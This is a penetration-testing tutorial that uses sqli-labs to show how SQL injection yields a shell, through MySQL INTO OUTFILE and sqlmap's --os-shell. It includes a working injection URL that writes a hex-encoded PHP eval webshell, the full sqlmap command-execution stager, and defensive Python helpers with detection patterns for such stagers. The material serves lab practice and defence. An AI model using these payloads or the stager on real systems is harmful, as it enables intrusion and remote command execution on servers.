Penetration Testing|Several Ways to Get a Shell Through SQL Injection

Table of Contents

1. into outfile

Conditions of use

Write to webshell

2. --os-shell

--sql-shell

This article introduces several methods of using SQL injection to obtain system-level access: one uses the into outfile function, the other uses sqlmap's --os-shell.

1. into outfile

Conditions of use

1. Prerequisites for using this method

  • The web directory is writable, and single quotes can be used in the injection
  • The absolute path of the website is known (the web root, or any directory below it, will work)
  • secure_file_priv has no specific value, i.e. it is empty (check in mysql/my.ini)

2. secure_file_priv

secure_file_priv restricts the directories in which LOAD DATA, INTO OUTFILE, INTO DUMPFILE and LOAD_FILE() are permitted to write and read files. Since MySQL version 5.6.34 the value of secure_file_priv defaults to NULL. Its possible configurations are as follows:

  • When secure_file_priv is NULL, mysqld is restricted and allows no import or export at all
  • When secure_file_priv is /tmp/, mysqld may import and export only within the /tmp/ directory
  • When secure_file_priv has no specific value (an empty string), there is no restriction on mysqld's import and export

So if we want to use into outfile to write a one-line webshell, secure_file_priv must be set to an empty value. How is it set? The value of secure_file_priv can only be changed by editing the configuration file; it cannot be modified with SQL statements.
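As an added example (not part of the original article), a small audit helper that classifies a secure_file_priv value according to the three cases above and checks whether a given INTO OUTFILE target would pass; the function names and the pathlib-based path comparison are my own approximation of the server's check.

```python
"""Audit helper (added example, not from the original article): classify a
MySQL secure_file_priv value and decide whether a given INTO OUTFILE target
would be allowed by it. The value is what `select @@secure_file_priv` reports
or what a `secure_file_priv = ...` line in my.ini sets."""
import re
from pathlib import PurePosixPath, PureWindowsPath

_INI_KEY = re.compile(r"^\s*secure[-_]file[-_]priv\s*(?:=\s*(.*?))?\s*$", re.I)


def parse_ini_value(line: str):
    """Value from a my.ini line like secure-file-priv = "C:/tmp/"; None if the
    line is a different option. A bare key or `key=` means the empty string."""
    m = _INI_KEY.match(line)
    if not m:
        return None
    return (m.group(1) or "").strip("\"'")


def classify(value) -> str:
    """None/NULL: import and export disabled; empty: unrestricted;
    anything else: restricted to that directory."""
    if value is None or value.strip().upper() == "NULL":
        return "disabled"
    return "unrestricted" if value.strip() == "" else "restricted"


def write_allowed(value, target: str) -> bool:
    """Approximation of the server-side check for SELECT ... INTO OUTFILE target.
    MySQL canonicalises both paths; this version instead rejects any '..'
    component and compares Windows paths case-insensitively via pathlib."""
    state = classify(value)
    if state != "restricted":
        return state == "unrestricted"
    base_dir = value.strip()
    cls = PureWindowsPath if re.match(r"^[A-Za-z]:", base_dir) else PurePosixPath
    base, path = cls(base_dir), cls(target)
    if ".." in path.parts:
        return False
    return base in path.parents
```

On the server itself, `select user, host from mysql.user where File_priv = 'Y';` lists the accounts that may use INTO OUTFILE at all, which is the other half of this audit.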

(1) Check the value of the secure_file_priv parameter

show global variables like '%secure%';

In the output, secure_file_priv defaults to NULL, which means mysqld is restricted and allows no import or export.

(2) Modify the value of secure_file_priv

Check whether mysql/my.ini contains a secure_file_priv parameter. If not, add the line secure_file_priv='' (an empty value) and restart the service.

Checking the value of secure_file_priv again now shows that it has become empty.

With this setting in place, we can use into outfile to write a one-line webshell (a "one-sentence Trojan").

Write to webshell

Let’s take the seventh level of sqli-labs as an example

1. Injection point judgment

If you enter correct syntax, the page displays normally; if the syntax is wrong, it shows only a syntax error. Since the page has only these two states, this is a blind injection. When we enter ?id=3')) and sleep(5) -- +, the response is delayed, so the injection point is 3')): our input is enclosed in single quotes, which are in turn enclosed in two parentheses.

2. Determine the number of columns

We use the order by statement to determine the number of columns. When order by 3, the display is normal. When order by 4, it is abnormal and it is judged to be 3 columns.

3. Write to webshell

The absolute path of the web root was obtained earlier by other means, so we can now write a one-line webshell. It is recommended (though not required) to hex-encode the webshell first; any text-to-hex converter will do.

Prefix the encoded string with 0x. Below, the hex-encoded one-line webshell is written to the file outfile.php in the web root.

?id=-3')) union select 1,0x3c3f706870206576616c28245f524551554553545b315d293b3f3e,3 into outfile 'C:\\Users\\Administrator.WIN2012\\Desktop\\phpStudy\\WWW\\outfile.php' -- +

Successfully written. The web path here must use doubled backslashes, otherwise the file is not written, because MySQL treats a single backslash in a string literal as an escape character. This is not specific to MySQL: C and Java compilers, configuration file parsers and web servers all face the same string-parsing problem, and since Windows traditionally separates paths with a single backslash, parsing such a path can produce unexpected errors. Writing the separator as \\ avoids this: whether or not the parsing engine treats the backslash as an escape, what ends up in memory is a single \, and the result is correct.
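To see concretely why the path needs doubled backslashes, here is an added example (not from the article) that emulates how MySQL unescapes the body of a single-quoted string literal. It assumes the default SQL mode (NO_BACKSLASH_ESCAPES not set) and handles only the escape sequences MySQL documents.

```python
"""Added example (not from the article): emulate how MySQL unescapes the body
of a single-quoted string literal, to show why a Windows path written with
single backslashes in an INTO OUTFILE clause is mangled while doubled
backslashes survive. Assumes NO_BACKSLASH_ESCAPES is not set."""

# Escape sequences MySQL recognises inside a string literal. A backslash
# before any other character is simply dropped and the character kept.
_MYSQL_ESCAPES = {
    "0": "\0", "'": "'", '"': '"', "b": "\b", "n": "\n",
    "r": "\r", "t": "\t", "Z": "\x1a", "\\": "\\", "%": "\\%", "_": "\\_",
}


def mysql_unescape(literal: str) -> str:
    """Return the in-memory string MySQL builds from a literal's body
    (the surrounding quotes already removed)."""
    out = []
    i = 0
    while i < len(literal):
        ch = literal[i]
        if ch == "\\" and i + 1 < len(literal):
            nxt = literal[i + 1]
            out.append(_MYSQL_ESCAPES.get(nxt, nxt))  # unknown escape: keep char only
            i += 2
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def path_survives(literal: str, intended: str) -> bool:
    """True if the literal, as MySQL parses it, still names the intended file."""
    return mysql_unescape(literal) == intended
```

Writing the Windows path with forward slashes avoids the problem entirely, since Windows accepts them as separators and MySQL does not treat them specially.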

4. Connect to webshell

Successfully connected

If instead secure_file_priv is set to NULL, the same write operation silently fails and no file is created.

So there are two situations in which the file is not written:

  • The path to the website is incorrect or is not escaped with double slashes
  • The value of secure_file_priv is not empty

2. --os-shell

Principle

--os-shell uses a UDF to escalate privileges and obtain a WebShell. It also writes two files to the server through into outfile: one executes system commands directly, the other uploads files.

This is an sqlmap option, and its prerequisites are:

  • The database account must be a DBA. Use --is-dba to check whether the account the website connects with is an administrator such as root in the mysql user table; if so, it is a DBA.
  • secure_file_priv has no specific value (is empty)
  • The absolute path of the website is known

Usage

Let’s take the first level of sqli-labs as an example

sqlmap -u http://192.168.43.145/2_Shotting_Range/sql/Less-1/?id=1 --os-shell

Here we need to select the scripting language of the website and its root path:

  • [1] common location(s) (C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/) (default) # sqlmap tries its built-in list of common paths
  • [2] custom location(s) # enter the absolute path yourself
  • [3] custom directory list file # supply your own directory dictionary; only the path to the dictionary file is needed
  • [4] brute force search

sqlmap generated two files in the specified directory (the file names are random, not fixed):

  • tmpbeewq.php is used to execute system commands
  • tmpuqvgw.php is used to upload files

1. The content of tmpbeewq.php is:

<?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set("max_execution_time",0);$z=@ini_get("disable_functions");if(!empty($z)){$z=preg_replace("/[, ]+/",',',$z);$z=explode(',',$z);$z=array_map("trim",$z);}else{$z=array();}$c=$c." 2>&1\n";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f("system")){ob_start();system($c);$w=ob_get_clean();}elseif(f("proc_open")){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f("shell_exec")){$w=shell_exec($c);}elseif(f("passthru")){ob_start();passthru($c);$w=ob_get_clean();}elseif(f("popen")){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f("exec")){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}echo"<pre>$w</pre>";?>

Visiting the file in a browser returns the command output.
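From the defender's side, the stager above has a recognisable shape: it reads a command from the request, probes disable_functions, picks an execution function with is_callable and wraps the output in a pre tag. As an added example (not part of the article or of sqlmap), a trait-based check that a defender can run over PHP files in a web root to flag such stagers; the trait list, scoring threshold and the two sample files are my own construction.

```python
"""Added example (not part of the article or of sqlmap): a signature check a
defender can run over PHP files in a web root to flag stagers of the kind
shown above. It scores the file's traits rather than matching it byte for
byte, so a renamed or lightly edited copy is still flagged. The two sample
files below are constructed here, not taken from a real server."""
import re

# Traits of the stager above: command read from the request, a probe of
# disable_functions, is_callable() to pick an execution function, a fallback
# chain of execution functions, and output wrapped in <pre>.
STAGER_TRAITS = [
    r"\$_(?:REQUEST|GET|POST)\s*\[",
    r"ini_get\s*\(\s*['\"]disable_functions",
    r"is_callable\s*\(",
    r"\b(?:system|proc_open|shell_exec|passthru|popen|exec)\s*\(",
    r"ignore_user_abort\s*\(",
    r"<pre>",
]


def stager_score(php_source: str) -> int:
    """Number of distinct traits found, 0..len(STAGER_TRAITS)."""
    return sum(1 for pat in STAGER_TRAITS if re.search(pat, php_source))


def looks_like_stager(php_source: str, threshold: int = 4) -> bool:
    """A threshold of 4 keeps ordinary pages that merely read $_GET below it."""
    return stager_score(php_source) >= threshold


# Constructed samples: an ordinary page and an excerpt in the stager's style.
BENIGN = '<?php $name = htmlspecialchars($_GET["name"]); echo "<p>Hi $name</p>"; ?>'
SUSPECT = ('<?php $c=$_REQUEST["cmd"];@ignore_user_abort(1);'
           '$z=@ini_get("disable_functions");'
           'function f($n){global $z;return is_callable($n)and!in_array($n,$z);}'
           'echo"<pre>$w</pre>";?>')

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, stager_score(src), looks_like_stager(src))
```

Because the file names sqlmap chooses are random, a check like this, run over every .php file under the web root, is more reliable than looking for a known name.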

2. Use tmpuqvgw.php to upload files

Let’s upload a php one-sentence backdoor

Accessing the uploaded file succeeds.

So both methods require knowing the absolute path of the website.

Supplement:

As mentioned above, there are three prerequisites for writing a webshell with sqlmap, and none of them can be missing.

  • The web directory is writable, and single quotes can be used in the injection
  • Know the absolute path of the website
  • secure_file_priv has no specific value (view in mysql/my.ini)

During a recent network protection exercise, I used sqlmap to write a webshell. I knew the root directory of the website, but still could not write the file. The reason was that the value of secure_file_priv was NULL. How do you find out what this value is?

--sql-shell

We can use this to execute some sql statements first

sqlmap.py -u "xxx" --sql-shell

1. Check the file path (the path of mysql/data; the web root is usually in the same directory as mysql)

select @@datadir;

2. Check whether the value of secure_file_priv is empty

select @@secure_file_priv;

If the result is NULL, files cannot be written.

When the value is empty, the query returns an empty string.

